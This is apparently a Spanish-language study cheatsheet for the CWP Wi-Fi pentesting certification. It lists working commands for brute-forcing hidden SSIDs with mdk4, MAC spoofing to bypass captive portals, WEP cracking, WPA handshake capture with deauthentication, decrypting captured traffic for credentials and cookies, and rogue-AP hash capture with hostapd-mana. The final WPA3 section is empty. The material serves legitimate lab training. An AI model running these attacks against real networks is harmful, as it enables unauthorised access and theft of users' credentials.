👑CWP Cheatsheet
Redes Ocultas Scan

Escanear redes ocultas para encontrar su nombre. Esto lo hacemos con
mk4
-->
## Conguracion del canal 11
iwconfig wlan0 channel 11
## Ataque de fuerza bruta
mdk4 wlan0 p -t F0:9F:C2:6A:88:26 -f /root/rockyou-top100000.txt
Suponiendo que es un wifi, filtro dentro del rocku por algo que empiece por "wifi" y repito el ataque. Descubriendo asi la el SSID de la wifi -->
cat /root/rockyou-top100000.txt | awk '{print "wifi-" $1}' > /root/wifi-rockyou.txt


Redes OPN
Es posible que la red OPN (de wifi abierta) tenga el nombre oculto, asi que tras encontrar el nombre, debemos conectarnos
Probar contraseñas por defecto en el router/puerta de enlace
Evadir portal cautivo cambiando nuestra MAC por la de otro cliente con macchanger (ejemplo en Capitulo 5.1, reto 6)

## Apagamos la interfaz wlan2 (interfaz en modo normal que no utiliza modo monitor)
ip link set wlan2 down
## Cambiamos la direccion MAC por uno de los clientes
macchanger -m 80:18:44:BF:72:47 wlan2
## Levantamos la interfaz
ip link set wlan2 up
## Paramos NetworkManager por posibles errores
systemctl stop network-manager.service
## Comprobamos MACs
macchanger wlan2

Interceptar trafico en escucha con
airodump-ng
y capturar peticiones como; credenciales de acceso al router

Redes WEP
(Modo facil) - Utilizamos la herramienta automatizada
Besside-ng
, especificando el BSSID del AP para que haga el ataque de fuerza bruta al "PIN". Por ultimo nos conectamos


Redes PSK - WPA/WPA2
Escanear trafico de ese AP/BSSID para captura el handshake y crackear la contraseña
Si es necesario, hacer ataques de des autentificación
Si tenemos la contraseña de la wifi y el trafico capturado/handshake, podemos desencriptar el trafico con
airdecap-ng
para ver posible credenciales enviadas y/o cookies de sesion (Capitulo 5.4, challenge 9)Una vez dentro de la red, podemos comprobar si existe aislamiento entre clientes, lanzado un
arp-scan
ynmap
para ver sus puertos y tambien si tienen webs corriendoComprobar usuarios conectados a APs/BSSIDs imbisibles, pero con probes. Si existen, realizar un ataque
NO AP
conhostapd-mana
para obtener su hash y crakear la password

Redes SAE - WPA3
Last updated